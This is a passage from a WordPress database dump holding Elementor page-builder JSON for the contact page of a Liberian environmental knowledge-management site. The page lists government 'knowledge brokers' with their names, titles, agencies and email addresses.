href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24466,3610,'_elementor_edit_mode','builder'),(24467,3610,'_elementor_template_type','wp-page'),(24468,3610,'_elementor_version','3.0.16'),(24469,3610,'_wp_page_template','default'),(24470,3610,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br 